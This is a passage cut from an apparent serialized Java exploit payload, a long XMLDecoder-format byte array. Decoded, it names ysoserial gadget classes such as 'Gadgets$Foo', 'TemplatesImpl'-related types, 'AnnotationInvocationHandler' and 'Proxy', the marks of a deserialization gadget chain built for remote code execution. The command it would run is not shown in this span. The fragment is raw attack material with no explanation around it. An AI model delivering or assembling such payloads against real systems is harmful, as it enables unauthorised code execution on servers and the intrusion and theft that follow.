index=\"2671\"><byte>5</byte></void><void index=\"2672\"><byte>113</byte></void><void index=\"2673\"><byte>-26</byte></void><void index=\"2674\"><byte>105</byte></void><void index=\"2675\"><byte>-18</byte></void><void index=\"2676\"><byte>60</byte></void><void index=\"2677\"><byte>109</byte></void><void index=\"2678\"><byte>71</byte></void><void index=\"2679\"><byte>24</byte></void><void index=\"2680\"><byte>1</byte></void><void index=\"2681\"><byte>0</byte></void><void index=\"2682\"><byte>6</byte></void><void index=\"2683\"><byte>60</byte></void><void index=\"2684\"><byte>105</byte></void><void index=\"2685\"><byte>110</byte></void><void index=\"2686\"><byte>105</byte></void><void index=\"2687\"><byte>116</byte></void><void index=\"2688\"><byte>62</byte></void><void index=\"2689\"><byte>1</byte></void><void index=\"2690\"><byte>0</byte></void><void index=\"2691\"><byte>3</byte></void><void index=\"2692\"><byte>40</byte></void><void index=\"2693\"><byte>41</byte></void><void index=\"2694\"><byte>86</byte></void><void index=\"2695\"><byte>1</byte></void><void index=\"2696\"><byte>0</byte></void><void index=\"2697\"><byte>4</byte></void><void index=\"2698\"><byte>67</byte></void><void index=\"2699\"><byte>111</byte></void><void index=\"2700\"><byte>100</byte></void><void index=\"2701\"><byte>101</byte></void><void index=\"2702\"><byte>1</byte></void><void index=\"2703\"><byte>0</byte></void><void index=\"2704\"><byte>15</byte></void><void index=\"2705\"><byte>76</byte></void><void index=\"2706\"><byte>105</byte></void><void index=\"2707\"><byte>110</byte></void><void index=\"2708\"><byte>101</byte></void><void index=\"2709\"><byte>78</byte></void><void index=\"2710\"><byte>117</byte></void><void index=\"2711\"><byte>109</byte></void><void index=\"2712\"><byte>98</byte></void><void index=\"2713\"><byte>101</byte></void><void index=\"2714\"><byte>114</byte></void><void index=\"2715\"><byte>84</byte></void><void index=\"2716\"><byte>97</byte></void><void index=\"2717\"><byte>98</byte></void><void index=\"2718\"><byte>108</byte></void><void index=\"2719\"><byte>101</byte></void><void index=\"2720\"><byte>1</byte></void><void index=\"2721\"><byte>0</byte></void><void index=\"2722\"><byte>18</byte></void><void index=\"2723\"><byte>76</byte></void><void index=\"2724\"><byte>111</byte></void><void index=\"2725\"><byte>99</byte></void><void index=\"2726\"><byte>97</byte></void><void index=\"2727\"><byte>108</byte></void><void index=\"2728\"><byte>86</byte></void><void index=\"2729\"><byte>97</byte></void><void index=\"2730\"><byte>114</byte></void><void index=\"2731\"><byte>105</byte></void><void index=\"2732\"><byte>97</byte></void><void index=\"2733\"><byte>98</byte></void><void index=\"2734\"><byte>108</byte></void><void index=\"2735\"><byte>101</byte></void><void index=\"2736\"><byte>84</byte></void><void index=\"2737\"><byte>97</byte></void><void index=\"2738\"><byte>98</byte></void><void index=\"2739\"><byte>108</byte></void><void index=\"2740\"><byte>101</byte></void><void index=\"2741\"><byte>1</byte></void><void index=\"2742\"><byte>0</byte></void><void index=\"2743\"><byte>4</byte></void><void index=\"2744\"><byte>116</byte></void><void index=\"2745\"><byte>104</byte></void><void index=\"2746\"><byte>105</byte></void><void index=\"2747\"><byte>115</byte></void><void index=\"2748\"><byte>1</byte></void><void index=\"2749\"><byte>0</byte></void><void index=\"2750\"><byte>3</byte></void><void index=\"2751\"><byte>70</byte></void><void index=\"2752\"><byte>111</byte></void><void index=\"2753\"><byte>111</byte></void><void index=\"2754\"><byte>1</byte></void><void index=\"2755\"><byte>0</byte></void><void index=\"2756\"><byte>12</byte></void><void index=\"2757\"><byte>73</byte></void><void index=\"2758\"><byte>110</byte></void><void index=\"2759\"><byte>110</byte></void><void index=\"2760\"><byte>101</byte></void><void index=\"2761\"><byte>114</byte></void><void index=\"2762\"><byte>67</byte></void><void index=\"2763\"><byte>108</byte></void><void index=\"2764\"><byte>97</byte></void><void index=\"2765\"><byte>115</byte></void><void index=\"2766\"><byte>115</byte></void><void index=\"2767\"><byte>101</byte></void><void index=\"2768\"><byte>115</byte></void><void index=\"2769\"><byte>1</byte></void><void index=\"2770\"><byte>0</byte></void><void index=\"2771\"><byte>37</byte></void><void index=\"2772\"><byte>76</byte></void><void index=\"2773\"><byte>121</byte></void><void index=\"2774\"><byte>115</byte></void><void index=\"2775\"><byte>111</byte></void><void index=\"2776\"><byte>115</byte></void><void index=\"2777\"><byte>101</byte></void><void index=\"2778\"><byte>114</byte></void><void index=\"2779\"><byte>105</byte></void><void index=\"2780\"><byte>97</byte></void><void index=\"2781\"><byte>108</byte></void><void index=\"2782\"><byte>47</byte></void><void index=\"2783\"><byte>112</byte></void><void index=\"2784\"><byte>97</byte></void><void index=\"2785\"><byte>121</byte></void><void index=\"2786\"><byte>108</byte></void><void index=\"2787\"><byte>111</byte></void><void index=\"2788\"><byte>97</byte></void><void index=\"2789\"><byte>100</byte></void><void index=\"2790\"><byte>115</byte></void><void index=\"2791\"><byte>47</byte></void><void index=\"2792\"><byte>117</byte></void><void index=\"2793\"><byte>116</byte></void><void index=\"2794\"><byte>105</byte></void><void index=\"2795\"><byte>108</byte></void><void index=\"2796\"><byte>47</byte></void><void index=\"2797\"><byte>71</byte></void><void index=\"2798\"><byte>97</byte></void><void index=\"2799\"><byte>100</byte></void><void index=\"2800\"><byte>103</byte></void><void index=\"2801\"><byte>101</byte></void><void index=\"2802\"><byte>116</byte></void><void index=\"2803\"><byte>115</byte></void><void index=\"2804\"><byte>36</byte></void><void index=\"2805\"><byte>70</byte></void><void index=\"2806\"><byte>111</byte></void><void index=\"2807\"><byte>111</byte></void><void index=\"2808\"><byte>59</byte></void><void index=\"2809\"><byte>1</byte></void><void index=\"2810\"><byte>0</byte></void><void index=\"2811\"><byte>10</byte></void><void index=\"2812\"><byte>83</byte></void><void index=\"2813\"><byte>111</byte></void><void index=\"2814\"><byte>117</byte></void><void index=\"2815\"><byte>114</byte></void><void index=\"2816\"><byte>99</byte></void><void index=\"2817\"><byte>101</byte></void><void index=\"2818\"><byte>70</byte></void><void index=\"2819\"><byte>105</byte></void><void index=\"2820\"><byte>108</byte></void><void index=\"2821\"><byte>101</byte></void><void index=\"2822\"><byte>1</byte></void><void index=\"2823\"><byte>0</byte></void><void index=\"2824\"><byte>12</byte></void><void index=\"2825\"><byte>71</byte></void><void index=\"2826\"><byte>97</byte></void><void index=\"2827\"><byte>100</byte></void><void index=\"2828\"><byte>103</byte></void><void index=\"2829\"><byte>101</byte></void><void index=\"2830\"><byte>116</byte></void><void index=\"2831\"><byte>115</byte></void><void index=\"2832\"><byte>46</byte></void><void index=\"2833\"><byte>106</byte></void><void index=\"2834\"><byte>97</byte></void><void index=\"2835\"><byte>118</byte></void><void index=\"2836\"><byte>97</byte></void><void index=\"2837\"><byte>12</byte></void><void index=\"2838\"><byte>0</byte></void><void index=\"2839\"><byte>10</byte></void><void index=\"2840\"><byte>0</byte></void><void index=\"2841\"><byte>11</byte></void><void index=\"2842\"><byte>7</byte></void><void index=\"2843\"><byte>0</byte></void><void index=\"2844\"><byte>26</byte></void><void index=\"2845\"><byte>1</byte></void><void index=\"2846\"><byte>0</byte></void><void index=\"2847\"><byte>35</byte></void><void index=\"2848\"><byte>121</byte></void><void index=\"2849\"><byte>115</byte></void><void index=\"2850\"><byte>111</byte></void><void index=\"2851\"><byte>115</byte></void><void index=\"2852\"><byte>101</byte></void><void index=\"2853\"><byte>114</byte></void><void index=\"2854\"><byte>105</byte></void><void index=\"2855\"><byte>97</byte></void><void index=\"2856\"><byte>108</byte></void><void index=\"2857\"><byte>47</byte></void><void index=\"2858\"><byte>112</byte></void><void index=\"2859\"><byte>97</byte></void><void index=\"2860\"><byte>121</byte></void><void index=\"2861\"><byte>108</byte></void><void index=\"2862\"><byte>111</byte></void><void index=\"2863\"><byte>97</byte></void><void index=\"2864\"><byte>100</byte></void><void index=\"2865\"><byte>115</byte></void><void index=\"2866\"><byte>47</byte></void><void index=\"2867\"><byte>117</byte></void><void index=\"2868\"><byte>116</byte></void><void index=\"2869\"><byte>105</byte></void><void index=\"2870\"><byte>108</byte></void><void index=\"2871\"><byte>47</byte></void><void index=\"2872\"><byte>71</byte></void><void index=\"2873\"><byte>97</byte></void><void index=\"2874\"><byte>100</byte></void><void index=\"2875\"><byte>103</byte></void><void index=\"2876\"><byte>101</byte></void><void index=\"2877\"><byte>116</byte></void><void index=\"2878\"><byte>115</byte></void><void index=\"2879\"><byte>36</byte></void><void index=\"2880\"><byte>70</byte></void><void index=\"2881\"><byte>111</byte></void><void index=\"2882\"><byte>111</byte></void><void index=\"2883\"><byte>1</byte></void><void index=\"2884\"><byte>0</byte></void><void index=\"2885\"><byte>16</byte></void><void index=\"2886\"><byte>106</byte></void><void index=\"2887\"><byte>97</byte></void><void index=\"2888\"><byte>118</byte></void><void index=\"2889\"><byte>97</byte></void><void index=\"2890\"><byte>47</byte></void><void index=\"2891\"><byte>108</byte></void><void index=\"2892\"><byte>97</byte></void><void index=\"2893\"><byte>110</byte></void><void index=\"2894\"><byte>103</byte></void><void index=\"2895\"><byte>47</byte></void><void index=\"2896\"><byte>79</byte></void><void index=\"2897\"><byte>98</byte></void><void index=\"2898\"><byte>106</byte></void><void index=\"2899\"><byte>101</byte></void><void index=\"2900\"><byte>99</byte></void><void index=\"2901\"><byte>116</byte></void><void index=\"2902\"><byte>1</byte></void><void index=\"2903\"><byte>0</byte></void><void index=\"2904\"><byte>20</byte></void><void index=\"2905\"><byte>106</byte></void><void index=\"2906\"><byte>97</byte></void><void index=\"2907\"><byte>118</byte></void><void index=\"2908\"><byte>97</byte></void><void index=\"2909\"><byte>47</byte></void><void index=\"2910\"><byte>105</byte></void><void index=\"2911\"><byte>111</byte></void><void index=\"2912\"><byte>47</byte></void><void index=\"2913\"><byte>83</byte></void><void index=\"2914\"><byte>101</byte></void><void index=\"2915\"><byte>114</byte></void><void index=\"2916\"><byte>105</byte></void><void index=\"2917\"><byte>97</byte></void><void index=\"2918\"><byte>108</byte></void><void index=\"2919\"><byte>105</byte></void><void index=\"2920\"><byte>122</byte></void><void index=\"2921\"><byte>97</byte></void><void index=\"2922\"><byte>98</byte></void><void index=\"2923\"><byte>108</byte></void><void index=\"2924\"><byte>101</byte></void><void index=\"2925\"><byte>1</byte></void><void index=\"2926\"><byte>0</byte></void><void index=\"2927\"><byte>31</byte></void><void index=\"2928\"><byte>121</byte></void><void index=\"2929\"><byte>115</byte></void><void index=\"2930\"><byte>111</byte></void><void index=\"2931\"><byte>115</byte></void><void index=\"2932\"><byte>101</byte></void><void index=\"2933\"><byte>114</byte></void><void index=\"2934\"><byte>105</byte></void><void index=\"2935\"><byte>97</byte></void><void index=\"2936\"><byte>108</byte></void><void index=\"2937\"><byte>47</byte></void><void index=\"2938\"><byte>112</byte></void><void index=\"2939\"><byte>97</byte></void><void index=\"2940\"><byte>121</byte></void><void index=\"2941\"><byte>108</byte></void><void index=\"2942\"><byte>111</byte></void><void index=\"2943\"><byte>97</byte></void><void index=\"2944\"><byte>100</byte></void><void index=\"2945\"><byte>115</byte></void><void index=\"2946\"><byte>47</byte></void><void index=\"2947\"><byte>117</byte></void><void index=\"2948\"><byte>116</byte></void><void index=\"2949\"><byte>105</byte></void><void index=\"2950\"><byte>108</byte></void><void index=\"2951\"><byte>47</byte></void><void index=\"2952\"><byte>71</byte></void><void index=\"2953\"><byte>97</byte></void><void index=\"2954\"><byte>100</byte></void><void index=\"2955\"><byte>103</byte></void><void index=\"2956\"><byte>101</byte></void><void index=\"2957\"><byte>116</byte></void><void index=\"2958\"><byte>115</byte></void><void index=\"2959\"><byte>0</byte></void><void index=\"2960\"><byte>33</byte></void><void index=\"2961\"><byte>0</byte></void><void index=\"2962\"><byte>2</byte></void><void index=\"2963\"><byte>0</byte></void><void index=\"2964\"><byte>3</byte></void><void index=\"2965\"><byte>0</byte></void><void index=\"2966\"><byte>1</byte></void><void index=\"2967\"><byte>0</byte></void><void index=\"2968\"><byte>4</byte></void><void index=\"2969\"><byte>0</byte></void><void index=\"2970\"><byte>1</byte></void><void index=\"2971\"><byte>0</byte></void><void index=\"2972\"><byte>26</byte></void><void index=\"2973\"><byte>0</byte></void><void index=\"2974\"><byte>5</byte></void><void index=\"2975\"><byte>0</byte></void><void index=\"2976\"><byte>6</byte></void><void index=\"2977\"><byte>0</byte></void><void index=\"2978\"><byte>1</byte></void><void index=\"2979\"><byte>0</byte></void><void index=\"2980\"><byte>7</byte></void><void index=\"2981\"><byte>0</byte></void><void index=\"2982\"><byte>0</byte></void><void index=\"2983\"><byte>0</byte></void><void index=\"2984\"><byte>2</byte></void><void index=\"2985\"><byte>0</byte></void><void index=\"2986\"><byte>8</byte></void><void index=\"2987\"><byte>0</byte></void><void index=\"2988\"><byte>1</byte></void><void index=\"2989\"><byte>0</byte></void><void index=\"2990\"><byte>1</byte></void><void index=\"2991\"><byte>0</byte></void><void index=\"2992\"><byte>10</byte></void><void index=\"2993\"><byte>0</byte></void><void index=\"2994\"><byte>11</byte></void><void index=\"2995\"><byte>0</byte></void><void index=\"2996\"><byte>1</byte></void><void index=\"2997\"><byte>0</byte></void><void index=\"2998\"><byte>12</byte></void><void index=\"2999\"><byte>0</byte></void><void index=\"3000\"><byte>0</byte></void><void index=\"3001\"><byte>0</byte></void><void index=\"3002\"><byte>47</byte></void><void index=\"3003\"><byte>0</byte></void><void index=\"3004\"><byte>1</byte></void><void index=\"3005\"><byte>0</byte></void><void index=\"3006\"><byte>1</byte></void><void index=\"3007\"><byte>0</byte></void><void index=\"3008\"><byte>0</byte></void><void index=\"3009\"><byte>0</byte></void><void index=\"3010\"><byte>5</byte></void><void index=\"3011\"><byte>42</byte></void><void index=\"3012\"><byte>-73</byte></void><void index=\"3013\"><byte>0</byte></void><void index=\"3014\"><byte>1</byte></void><void index=\"3015\"><byte>-79</byte></void><void index=\"3016\"><byte>0</byte></void><void index=\"3017\"><byte>0</byte></void><void index=\"3018\"><byte>0</byte></void><void index=\"3019\"><byte>2</byte></void><void index=\"3020\"><byte>0</byte></void><void index=\"3021\"><byte>13</byte></void><void index=\"3022\"><byte>0</byte></void><void index=\"3023\"><byte>0</byte></void><void index=\"3024\"><byte>0</byte></void><void index=\"3025\"><byte>6</byte></void><void index=\"3026\"><byte>0</byte></void><void index=\"3027\"><byte>1</byte></void><void index=\"3028\"><byte>0</byte></void><void index=\"3029\"><byte>0</byte></void><void index=\"3030\"><byte>0</byte></void><void index=\"3031\"><byte>54</byte></void><void index=\"3032\"><byte>0</byte></void><void index=\"3033\"><byte>14</byte></void><void index=\"3034\"><byte>0</byte></void><void index=\"3035\"><byte>0</byte></void><void index=\"3036\"><byte>0</byte></void><void index=\"3037\"><byte>12</byte></void><void index=\"3038\"><byte>0</byte></void><void index=\"3039\"><byte>1</byte></void><void index=\"3040\"><byte>0</byte></void><void index=\"3041\"><byte>0</byte></void><void index=\"3042\"><byte>0</byte></void><void index=\"3043\"><byte>5</byte></void><void index=\"3044\"><byte>0</byte></void><void index=\"3045\"><byte>15</byte></void><void index=\"3046\"><byte>0</byte></void><void index=\"3047\"><byte>18</byte></void><void index=\"3048\"><byte>0</byte></void><void index=\"3049\"><byte>0</byte></void><void index=\"3050\"><byte>0</byte></void><void index=\"3051\"><byte>2</byte></void><void index=\"3052\"><byte>0</byte></void><void index=\"3053\"><byte>19</byte></void><void index=\"3054\"><byte>0</byte></void><void index=\"3055\"><byte>0</byte></void><void index=\"3056\"><byte>0</byte></void><void index=\"3057\"><byte>2</byte></void><void index=\"3058\"><byte>0</byte></void><void index=\"3059\"><byte>20</byte></void><void index=\"3060\"><byte>0</byte></void><void index=\"3061\"><byte>17</byte></void><void index=\"3062\"><byte>0</byte></void><void index=\"3063\"><byte>0</byte></void><void index=\"3064\"><byte>0</byte></void><void index=\"3065\"><byte>10</byte></void><void index=\"3066\"><byte>0</byte></void><void index=\"3067\"><byte>1</byte></void><void index=\"3068\"><byte>0</byte></void><void index=\"3069\"><byte>2</byte></void><void index=\"3070\"><byte>0</byte></void><void index=\"3071\"><byte>22</byte></void><void index=\"3072\"><byte>0</byte></void><void index=\"3073\"><byte>16</byte></void><void index=\"3074\"><byte>0</byte></void><void index=\"3075\"><byte>9</byte></void><void index=\"3076\"><byte>112</byte></void><void index=\"3077\"><byte>116</byte></void><void index=\"3078\"><byte>0</byte></void><void index=\"3079\"><byte>4</byte></void><void index=\"3080\"><byte>80</byte></void><void index=\"3081\"><byte>119</byte></void><void index=\"3082\"><byte>110</byte></void><void index=\"3083\"><byte>114</byte></void><void index=\"3084\"><byte>112</byte></void><void index=\"3085\"><byte>119</byte></void><void index=\"3086\"><byte>1</byte></void><void index=\"3087\"><byte>0</byte></void><void index=\"3088\"><byte>120</byte></void><void index=\"3089\"><byte>115</byte></void><void index=\"3090\"><byte>125</byte></void><void index=\"3091\"><byte>0</byte></void><void index=\"3092\"><byte>0</byte></void><void index=\"3093\"><byte>0</byte></void><void index=\"3094\"><byte>1</byte></void><void index=\"3095\"><byte>0</byte></void><void index=\"3096\"><byte>29</byte></void><void index=\"3097\"><byte>106</byte></void><void index=\"3098\"><byte>97</byte></void><void index=\"3099\"><byte>118</byte></void><void index=\"3100\"><byte>97</byte></void><void index=\"3101\"><byte>120</byte></void><void index=\"3102\"><byte>46</byte></void><void index=\"3103\"><byte>120</byte></void><void index=\"3104\"><byte>109</byte></void><void index=\"3105\"><byte>108</byte></void><void index=\"3106\"><byte>46</byte></void><void index=\"3107\"><byte>116</byte></void><void index=\"3108\"><byte>114</byte></void><void index=\"3109\"><byte>97</byte></void><void index=\"3110\"><byte>110</byte></void><void index=\"3111\"><byte>115</byte></void><void index=\"3112\"><byte>102</byte></void><void index=\"3113\"><byte>111</byte></void><void index=\"3114\"><byte>114</byte></void><void index=\"3115\"><byte>109</byte></void><void index=\"3116\"><byte>46</byte></void><void index=\"3117\"><byte>84</byte></void><void index=\"3118\"><byte>101</byte></void><void index=\"3119\"><byte>109</byte></void><void index=\"3120\"><byte>112</byte></void><void index=\"3121\"><byte>108</byte></void><void index=\"3122\"><byte>97</byte></void><void index=\"3123\"><byte>116</byte></void><void index=\"3124\"><byte>101</byte></void><void index=\"3125\"><byte>115</byte></void><void index=\"3126\"><byte>120</byte></void><void index=\"3127\"><byte>114</byte></void><void index=\"3128\"><byte>0</byte></void><void index=\"3129\"><byte>23</byte></void><void index=\"3130\"><byte>106</byte></void><void index=\"3131\"><byte>97</byte></void><void index=\"3132\"><byte>118</byte></void><void index=\"3133\"><byte>97</byte></void><void index=\"3134\"><byte>46</byte></void><void index=\"3135\"><byte>108</byte></void><void index=\"3136\"><byte>97</byte></void><void index=\"3137\"><byte>110</byte></void><void index=\"3138\"><byte>103</byte></void><void index=\"3139\"><byte>46</byte></void><void index=\"3140\"><byte>114</byte></void><void index=\"3141\"><byte>101</byte></void><void index=\"3142\"><byte>102</byte></void><void index=\"3143\"><byte>108</byte></void><void index=\"3144\"><byte>101</byte></void><void index=\"3145\"><byte>99</byte></void><void index=\"3146\"><byte>116</byte></void><void index=\"3147\"><byte>46</byte></void><void index=\"3148\"><byte>80</byte></void><void index=\"3149\"><byte>114</byte></void><void index=\"3150\"><byte>111</byte></void><void index=\"3151\"><byte>120</byte></void><void index=\"3152\"><byte>121</byte></void><void index=\"3153\"><byte>-31</byte></void><void index=\"3154\"><byte>39</byte></void><void index=\"3155\"><byte>-38</byte></void><void index=\"3156\"><byte>32</byte></void><void index=\"3157\"><byte>-52</byte></void><void index=\"3158\"><byte>16</byte></void><void index=\"3159\"><byte>67</byte></void><void index=\"3160\"><byte>-53</byte></void><void index=\"3161\"><byte>2</byte></void><void index=\"3162\"><byte>0</byte></void><void index=\"3163\"><byte>1</byte></void><void index=\"3164\"><byte>76</byte></void><void index=\"3165\"><byte>0</byte></void><void index=\"3166\"><byte>1</byte></void><void index=\"3167\"><byte>104</byte></void><void index=\"3168\"><byte>116</byte></void><void index=\"3169\"><byte>0</byte></void><void index=\"3170\"><byte>37</byte></void><void index=\"3171\"><byte>76</byte></void><void index=\"3172\"><byte>106</byte></void><void index=\"3173\"><byte>97</byte></void><void index=\"3174\"><byte>118</byte></void><void index=\"3175\"><byte>97</byte></void><void index=\"3176\"><byte>47</byte></void><void index=\"3177\"><byte>108</byte></void><void index=\"3178\"><byte>97</byte></void><void index=\"3179\"><byte>110</byte></void><void index=\"3180\"><byte>103</byte></void><void index=\"3181\"><byte>47</byte></void><void index=\"3182\"><byte>114</byte></void><void index=\"3183\"><byte>101</byte></void><void index=\"3184\"><byte>102</byte></void><void index=\"3185\"><byte>108</byte></void><void index=\"3186\"><byte>101</byte></void><void index=\"3187\"><byte>99</byte></void><void index=\"3188\"><byte>116</byte></void><void index=\"3189\"><byte>47</byte></void><void index=\"3190\"><byte>73</byte></void><void index=\"3191\"><byte>110</byte></void><void index=\"3192\"><byte>118</byte></void><void index=\"3193\"><byte>111</byte></void><void index=\"3194\"><byte>99</byte></void><void index=\"3195\"><byte>97</byte></void><void index=\"3196\"><byte>116</byte></void><void index=\"3197\"><byte>105</byte></void><void index=\"3198\"><byte>111</byte></void><void index=\"3199\"><byte>110</byte></void><void index=\"3200\"><byte>72</byte></void><void index=\"3201\"><byte>97</byte></void><void index=\"3202\"><byte>110</byte></void><void index=\"3203\"><byte>100</byte></void><void index=\"3204\"><byte>108</byte></void><void index=\"3205\"><byte>101</byte></void><void index=\"3206\"><byte>114</byte></void><void index=\"3207\"><byte>59</byte></void><void index=\"3208\"><byte>120</byte></void><void index=\"3209\"><byte>112</byte></void><void index=\"3210\"><byte>115</byte></void><void index=\"3211\"><byte>114</byte></void><void index=\"3212\"><byte>0</byte></void><void index=\"3213\"><byte>50</byte></void><void index=\"3214\"><byte>115</byte></void><void index=\"3215\"><byte>117</byte></void><void index=\"3216\"><byte>110</byte></void><void index=\"3217\"><byte>46</byte></void><void index=\"3218\"><byte>114</byte></void><void index=\"3219\"><byte>101</byte></void><void index=\"3220\"><byte>102</byte></void><void index=\"3221\"><byte>108</byte></void><void index=\"3222\"><byte>101</byte></void><void index=\"3223\"><byte>99</byte></void><void index=\"3224\"><byte>116</byte></void><void index=\"3225\"><byte>46</byte></void><void index=\"3226\"><byte>97</byte></void><void index=\"3227\"><byte>110</byte></void><void index=\"3228\"><byte>110</byte></void><void index=\"3229\"><byte>111</byte></void><void index=\"3230\"><byte>116</byte></void><void index=\"3231\"><byte>97</byte></void><void index=\"3232\"><byte>116</byte></void><void index=\"3233\"><byte>105</byte></void><void index=\"3234\"><byte>111</byte></void><void index=\"3235\"><byte>110</byte></void><void index=\"3236\"><byte>46</byte></void><void index=\"3237\"><byte>65</byte></void><void index=\"3238\"><byte>110</byte></void><void index=\"3239\"><byte>110</byte></void><void index=\"3240\"><byte>111</byte></void><void index=\"3241\"><byte>116</byte></void><void index=\"3242\"><byte>97</byte></void><void index=\"3243\"><byte>116</byte></void><void index=\"3244\"><byte>105</byte></void><void index=\"3245\"><byte>111</byte></void><void index=\"3246\"><byte>110</byte></void><void index=\"3247\"><byte>73</byte></void><void index=\"3248\"><byte>110</byte></void><void index=\"3249\"><byte>118</byte></void><void index=\"3250\"><byte>111</byte></void><void index=\"3251\"><byte>99</byte></void><void index=\"3252\"><byte>97</byte></void><void index=\"3253\"><byte>116</byte></void><void index=\"3254\"><byte>105</byte></void><void index=\"3255\"><byte>111</byte></void><void index=\"3256\"><byte>110</byte></void><void index=\"3257\"><byte>72</byte></void><void index=\"3258\"><byte>97</byte></void><void index=\"3259\"><byte>110</byte></void><void index=\"3260\"><byte>100</byte></void><void index=\"3261\"><byte>108</byte></void><void index=\"3262\"><byte>101</byte></void><void index=\"3263\"><byte>114</byte></void><void index=\"3264\"><byte>85</byte></void><void index=\"3265\"><byte>-54</byte></void><void index=\"3266\"><byte>-11</byte></void><void index=\"3267\"><byte>15</byte></void><void index=\"3268\"><byte>21</byte></void><void index=\"3269\"><byte>-53</byte></void><void index=\"3270\"><byte>126</byte></void><void index=\"3271\"><byte>-91</byte></void><void index=\"3272\"><byte>2</byte></void><void index=\"3273\"><byte>0</byte></void><void index=\"3274\"><byte>2</byte></void><void index=\"3275\"><byte>76</byte></void><void index=\"3276\"><byte>0</byte></void><void index=\"3277\"><byte>12</byte></void><void index=\"3278\"><byte>109</byte></void><void index=\"3279\"><byte>101</byte></void><void index=\"3280\"><byte>109</byte></void><void index=\"3281\"><byte>98</byte></void><void index=\"3282\"><byte>101</byte></void><void index=\"3283\"><byte>114</byte></void><void index=\"3284\"><byte>86</byte></void><void index=\"3285\"><byte>97</byte></void><void index=\"3286\"><byte>108</byte></void><void index=\"3287\"><byte>117</byte></void><void index=\"3288\"><byte>101</byte></void><void index=\"3289\"><byte>115</byte></void><void index=\"3290\"><byte>116</byte></void><void index=\"3291\"><byte>0</byte></void><void index=\"3292\"><byte>15</byte></void><void index=\"3293\"><byte>76</byte></void><void index=\"3294\"><byte>106</byte></void><void index=\"3295\"><byte>97</byte></void><void index=\"3296\"><byte>118</byte></void><void index=\"3297\"><byte>97</byte></void><void index=\"3298\"><byte>47</byte></void><void index=\"3299\"><byte>117</byte></void><void index=\"3300\"><byte>116</byte></void><void index=\"3301\"><byte>105</byte></void><void index=\"3302\"><byte>108</byte></void><void index=\"3303\"><byte>47</byte></void><void index=\"3304\"><byte>77</byte></void><void index=\"3305\"><byte>97</byte></void><void index=\"3306\"><byte>112</byte></void><void index=\"3307\"><byte>59</byte></void><void index=\"3308\"><byte>76</byte></void><void index=\"3309\"><byte>0</byte></void><void index=\"3310\"><byte>4</byte></void><void index=\"3311\"><byte>116</byte></void><void index=\"3312\"><byte>121</byte></void><void index=\"3313\"><byte>112</byte></void><void index=\"3314\"><byte>101</byte></void><void index=\"3315\"><byte>116</byte></void><void index=\"3316\"><byte>0</byte></void><void index=\"3317\"><byte>17</byte></void><void index=\"3318\"><byte>76</byte></void><void index=\"3319\"><byte>106</byte></void><void index=\"3320\"><byte>97</byte></void><void index=\"3321\"><byte>118</byte></void><void index=\"3322\"><byte>97</byte></void><void index=\"3323\"><byte>47</byte></void><void index=\"3324\"><byte>108</byte></void><void index=\"3325\"><byte>97</byte></void><void index=\"3326\"><byte>110</byte></void><void index=\"3327\"><byte>103</byte></void><void index=\"3328\"><byte>47</byte></void><void index=\"3329\"><byte>67</byte></void><void index=\"3330\"><byte>108</byte></void><void index=\"3331\"><byte>97</byte></void><void index=\"3332\"><byte>115</byte></void><void index=\"3333\"><byte>115</byte></void><void index=\"3334\"><byte>59</byte></void><void index=\"3335\"><byte>120</byte></void><void index=\"3336\"><byte>112</byte></void><void index=\"3337\"><byte>115</byte></void><void index=\"3338\"><byte>114</byte></void><void index=\"3339\"><byte>0</byte></void><void index=\"3340\"><byte>17</byte></void><void index=\"3341\"><byte>106</byte></void><void index=\"3342\"><byte>97</byte></void><void index=\"3343\"><byte>118</byte></void><void index=\"3344\"><byte>97</byte></void><void index=\"3345\"><byte>46</byte></void><void index=\"3346\"><byte>117</byte></void><void index=\"3347\"><byte>116</byte></void><void index=\"3348\"><byte>105</byte></void><void index=\"3349\"><byte>108</byte></void><void index=\"3350\"><byte>46</byte></void><void index=\"3351\"><byte>72</byte></void><void index=\"3352\"><byte>97</byte></void><void index=\"3353\"><byte>115</byte></void><void index=\"3354\"><byte>104</byte></void><void index=\"3355\"><byte>77</byte></void><void index=\"3356\"><byte>97</byte></void><void index=\"3357\"><byte>112</byte></void><void index=\"3358\"><byte>5</byte></void><void index=\"3359\"><byte>7</byte></void><void index=\"3360\"><byte>-38</byte></void><void index=\"3361\"><byte>-63</byte></void><void index=\"3362\"><byte>-61</byte></void><void index=\"3363\"><byte>22</byte></void><void index=\"3364\"><byte>96</byte></void><void index=\"3365\"><byte>-47</byte></void><void index=\"3366\"><byte>3</byte></void><void index=\"3367\"><byte>0</byte></void><void index=\"3368\"><byte>2</byte></void><void index=\"3369\"><byte>70</byte></void><void index=\"3370\"><byte>0</byte></void><void index=\"3371\"><byte>10</byte></void><void index=\"3372\"><byte>108</byte></void><void index=\"3373\"><byte>111</byte></void><void index=\"3374\"><byte>97</byte></void><void index=\"3375\"><byte>100</byte></void><void index=\"3376\"><byte>70</byte></void><void index=\"3377\"><byte>97</byte></void><void index=\"3378\"><byte>99</byte></void><void index=\"3379\"><byte>116</byte></void><void index=\"3380\"><byte>111</byte></void><void index=\"3381\"><byte>114</byte></void><void index=\"3382\"><byte>73</byte></void><void index=\"3383\"><byte>0</byte></void><void index=\"3384\"><byte>9</byte></void><void index=\"3385\"><byte>116</byte></void><void index=\"3386\"><byte>104</byte></void><void index=\"3387\"><byte>114</byte></void><void index=\"3388\"><byte>101</byte></void><void index=\"3389\"><byte>115</byte></void><void index=\"3390\"><byte>104</byte></void><void index=\"3391\"><byte>111</byte></void><void index=\"3392\"><byte>108</byte></void><void index=\"3393\"><byte>100</byte></void><void index=\"3394\"><byte>120</byte></void><void index=\"3395\"><byte>112</byte></void><void index=\"3396\"><byte>63</byte></void><void index=\"3397\"><byte>64</byte></void><void index=\"3398\"><byte>0</byte></void><void index=\"3399\"><byte>0</byte></void><void index=\"3400\"><byte>0</byte></void><void index=\"3401\"><byte>0</byte></void><void index=\"3402\"><byte>0</byte></void><void index=\"3403\"><byte>12</byte></void><void index=\"3404\"><byte>119</byte></void><void index=\"3405\"><byte>8</byte></void><void index=\"3406\"><byte>0</byte></void><void index=\"3407\"><byte>0</byte></void><void index=\"3408\"><byte>0</byte></void><void index=\"3409\"><byte>16</byte></void><void index=\"3410\"><byte>0</byte></void><void index=\"3411\"><byte>0</byte></void><void index=\"3412\"><byte>0</byte></void><void index=\"3413\"><byte>1</byte></void><void index=\"3414\"><byte>116</byte></void><void index=\"3415\"><byte>0</byte></void><void index=\"3416\"><byte>8</byte></void><void index=\"3417\"><byte>102</byte></void><void index=\"3418\"><byte>53</byte></void><void index=\"3419\"><byte>97</byte></void><void 